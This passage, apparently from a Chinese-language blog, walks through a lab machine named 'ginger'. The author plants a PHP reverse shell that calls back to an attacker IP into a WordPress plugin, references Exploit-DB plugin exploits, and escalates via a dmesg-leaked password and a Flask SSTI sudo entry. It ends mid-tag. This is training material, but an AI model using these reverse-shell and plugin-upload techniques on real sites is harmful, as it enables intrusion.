SFTP.<\/p>\n<\/blockquote>\n<p>\u3002\u3002\u3002\u3002\u3002\u53d1\u73b0\u7248\u672c\u53f7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300872.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300872.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619093945091\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u5565\u5927\u7528\uff0c\u5728\u5c1d\u8bd5\u8fc7\u7a0b\u4e2d\u53d1\u73b0\u63d2\u4ef6\u811a\u672c\u53ef\u4ee5\u4fee\u6539\uff0c\u5c1d\u8bd5\u63d2\u5165\u53cd\u5f39shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300873.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300873.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619094254240\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300874.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300874.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619094404483\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5443\u5443\u5443\u5443<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300875.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300875.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619094612765\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ea\u80fd\u5c1d\u8bd5\u4e0a\u4f20\u63d2\u4ef6\u8fdb\u884c\u53cd\u5f39\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300876.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300876.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619094802030\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53ea\u80fd\u5c1d\u8bd5\u4e0b\u8f7d\u4e00\u4e2a\u63d2\u4ef6\uff0c\u518d\u628a\u53cd\u5f39shell\u63d2\u8fdb\u53bb\u4e0a\u4f20\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300877.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300877.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619095349577\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300878.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300878.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619095400181\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u6fc0\u6d3b\u63d2\u4ef6\uff0c\u4f46\u662f\u5e76\u672a\u5f39\u56de\u6765\u3002\u3002\u3002\u3002\u30026\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u6709\u6f0f\u6d1e\u53ef rce \u7684\u63d2\u4ef6\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/elementor\/elementor\/releases\/download\/v3.6.0-beta4\/elementor-3.6.0-beta4.zip\">https:\/\/github.com\/elementor\/elementor\/releases\/download\/v3.6.0-beta4\/elementor-3.6.0-beta4.zip<\/a><\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/50882\">https:\/\/www.exploit-db.com\/exploits\/50882<\/a><\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300879.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300879.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619101139860\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u670d\u4e86\u3002\u3002\u3002\u3002\u5c1d\u8bd5\uff1a<a href=\"https:\/\/www.exploit-db.com\/exploits\/51826\">https:\/\/www.exploit-db.com\/exploits\/51826<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300880.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300880.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619101500521\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6fc0\u6d3b\u4e00\u4e0b\uff0c\u7136\u540e\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300881.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619101602988\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5728\u5c1d\u8bd5\u65f6\u5019\u65e0\u610f\u95f4\u4f7f\u7528\u4e86\u4e4b\u524d\u90a3\u4e2a\u66f4\u6539\u4e86\u4ee3\u7801\u7136\u540e\u6d88\u5931\u7684\u63d2\u4ef6\uff0c\u7ed3\u679c\u6210\u529f\u53cd\u5f39shell\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/akismet\/akismet.php\n# \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n# \u2514\u2500$ find wordpress\/ -name hello.php 2&gt;\/dev\/null\n# wordpress\/wp-content\/plugins\/hello.php<\/code><\/pre>\n<p>\u5982\u679c\u786c\u8981\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u4e00\u5b9a\u8981\u9009\u6bd4\u8f83\u8001\u7684\u6d1e\u3002\u3002\u3002\u3002\u3002\u517c\u5bb9\u6027\u6bd4\u8f83\u597d\uff0c\u8fd9\u4e2a\u9776\u673a\u662f2021\u5e74\u7684\u4e86\uff0c\u6700\u597d\u627e\u4ee5\u524d\u7684\uff0c\u5e76\u4e14\u5c0f\u4e00\u70b9\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300882.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300882.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619102655680\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u8865\u5145<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ pwd                              \n\/\n(remote) www-data@ginger:\/$ cd ~\n(remote) www-data@ginger:\/var\/www$ cd html\n(remote) www-data@ginger:\/var\/www\/html$ cd \/wordpress\/wp-content\/plugins\/\nbash: cd: \/wordpress\/wp-content\/plugins\/: No such file or directory\n(remote) www-data@ginger:\/var\/www\/html$ cd wordpress\/wp-content\/plugins\/\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins$ ls -la\ntotal 32\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:14 .\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:22 ..\ndrwxr-xr-x 4 www-data www-data 4096 May 13  2021 akismet\ndrwxr-xr-x 7 www-data www-data 4096 Jun 19 04:14 canto\ndrwxr-xr-x 7 www-data www-data 4096 Jun  2  2021 cp-multi-view-calendar\ndrwxr-xr-x 2 www-data www-data 4096 Jun 19 03:53 hello-dolly-master\n-rw-r--r-- 1 www-data www-data 2578 Mar 18  2019 hello.php\n-rw-r--r-- 1 www-data www-data   28 Jun  5  2014 index.php\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins$ cd hello-dolly-master\/\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins\/hello-dolly-master$ ls -la\ntotal 20\ndrwxr-xr-x 2 www-data www-data 4096 Jun 19 03:53 .\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:14 ..\n-rw-r--r-- 1 www-data www-data 2261 Jun 19 03:53 hello.php\n-rw-r--r-- 1 www-data www-data  564 Jun 19 03:53 readme.txt\n-rw-r--r-- 1 www-data www-data 3911 Jun 19 03:53 rev.php\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins\/hello-dolly-master$ head rev.php \n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.107&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>\u8fd9\u610f\u5473\u7740\u4e4b\u524d\u90a3\u4e2a\u6211\u628ashell\u5939\u6742\u5230\u5f00\u6e90\u9879\u76ee\u7684\u65b9\u6cd5\u4e5f\u53ef\u4ee5\uff01<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.104\/\/wordpress\/wp-content\/plugins\/hello-dolly-master\/rev.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300883.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300883.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103053387\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ sudo -l\nMatching Defaults entries for www-data on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on ginger:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/sl<\/code><\/pre>\n<p>\u8fd0\u884c\u8dd1\u4e86\u4e00\u4e2a\u706b\u8f66\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300884.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103151120\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ file \/usr\/bin\/sl\n\/usr\/bin\/sl: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=ef67270a275b66decf5098e74f47a99d35de9803, stripped<\/code><\/pre>\n<p>\u5636\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300885.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103445836\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6ca1\u6709\u5229\u7528\u70b9\uff0c\u770b\u4e00\u4e0b\u6587\u4ef6\u5927\u5c0f\u662f\u5426\u6539\u53d8\u8fc7\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ whereis sl\nsl: \/usr\/bin\/sl \/usr\/games\/sl \/usr\/share\/man\/man6\/sl.6.gz\n(remote) www-data@ginger:\/$ md5sum \/usr\/games\/sl\nabafee153cc4f440b7e5bd5b67c06174  \/usr\/games\/sl\n(remote) www-data@ginger:\/$ md5sum \/usr\/bin\/sl\nabafee153cc4f440b7e5bd5b67c06174  \/usr\/bin\/sl<\/code><\/pre>\n<p>\u53d1\u73b0\u53ef\u80fd\u662f\u4e2a\u5154\u5b50\u6d1e\uff0c\u7528\u6765\u5751\u4eba\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>dmesg\u83b7\u53d6\u4fe1\u606f<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nsabrina\nwebmaster\ncaroline\n(remote) www-data@ginger:\/$ ls -la \/home\/\ntotal 20\ndrwxr-xr-x  5 root      root      4096 May 21  2021 .\ndrwxr-xr-x 18 root      root      4096 May 19  2021 ..\ndrwxr-xr--  5 caroline  webmaster 4096 May 25  2021 caroline\ndrwxr-xr-x  4 sabrina   sabrina   4096 May 25  2021 sabrina\ndrwx------  4 webmaster webmaster 4096 May 25  2021 webmaster<\/code><\/pre>\n<p>\u7136\u540e\u53bb\u7528\u6237\u76ee\u5f55\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/home$ cd sabrina\/\n(remote) www-data@ginger:\/home\/sabrina$ ls -la\ntotal 212\ndrwxr-xr-x 4 sabrina sabrina   4096 May 25  2021 .\ndrwxr-xr-x 5 root    root      4096 May 21  2021 ..\nlrwxrwxrwx 1 root    root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 sabrina sabrina    220 May 19  2021 .bash_logout\n-rw-r--r-- 1 sabrina sabrina   3557 May 21  2021 .bashrc\ndrwx------ 3 sabrina sabrina   4096 May 21  2021 .gnupg\ndrwxr-xr-x 3 sabrina sabrina   4096 May 21  2021 .local\n-rw-r--r-- 1 sabrina sabrina    837 May 21  2021 .profile\n-rw-r--r-- 1 sabrina sabrina     66 May 21  2021 .selected_editor\n-rw-r--r-- 1 sabrina sabrina 177674 May 21  2021 image.jpg\n-rw-r--r-- 1 sabrina sabrina    143 May 21  2021 password.txt\n(remote) www-data@ginger:\/home\/sabrina$ cat password.txt\nI forgot my password again...\nI wrote it down somewhere in this form: sabrina:password\nbut I don&#039;t know where... I have to search in my memory<\/code><\/pre>\n<blockquote>\n<p><em>dmesg \u547d\u4ee4<\/em>\u7528\u4e8e\u68c0\u67e5\u548c\u63a7\u5236\u5185\u6838\u7684\u73af\u5f62\u7f13\u51b2\u533a<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/home\/sabrina$ dmesg\n-------------------\n[   12.690831] IPv6: ADDRCONF(NETDEV_UP): enp0s3: link is not ready\n[   12.690842] IPv6: ADDRCONF(NETDEV_CHANGE): enp0s3: link becomes ready\n[   15.710708] sabrina:dontforgetyourpasswordbitch<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619104900587\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>SSTI\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">sabrina@ginger:~$ sudo -l\nMatching Defaults entries for sabrina on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sabrina may run the following commands on ginger:\n    (webmaster) NOPASSWD: \/usr\/bin\/python \/opt\/app.py *\nsabrina@ginger:~$ cat \/opt\/app.py\n\nfrom flask import Flask, request, render_template_string,render_template\n\napp = Flask(__name__)\n@app.route(&#039;\/&#039;)\ndef hello_ssti():\n    person = {&#039;name&#039;:&quot;world&quot;,&#039;secret&#039;:&quot;UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==&quot;}\n    if request.args.get(&#039;name&#039;):\n        person[&#039;name&#039;] = request.args.get(&#039;name&#039;)\n    template = &#039;&#039;&#039;&lt;h2&gt;Hello %s!&lt;\/h2&gt;&#039;&#039;&#039; % person[&#039;name&#039;]\n    return render_template_string(template,person=person)\ndef get_user_file(f_name):\n    with open(f_name) as f:\n        return f.readlines()\napp.jinja_env.globals[&#039;get_user_file&#039;] = get_user_file\n\nif __name__ == &quot;__main__&quot;:\n    app.run(debug=True)\n\nsabrina@ginger:~$ echo &#039;UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==&#039; | base64 -d\nPhevbhf? aivfvhz.pbz\/pnerref<\/code><\/pre>\n<p>\u770b\u51fd\u6570\u540d\u5b57\uff0c\u53ef\u80fd\u662f\u8003<code>SSTI<\/code>\uff1a<\/p>\n<blockquote>\n<p>\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md<\/a><\/p>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u8ba9\u5176\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300887.png\" 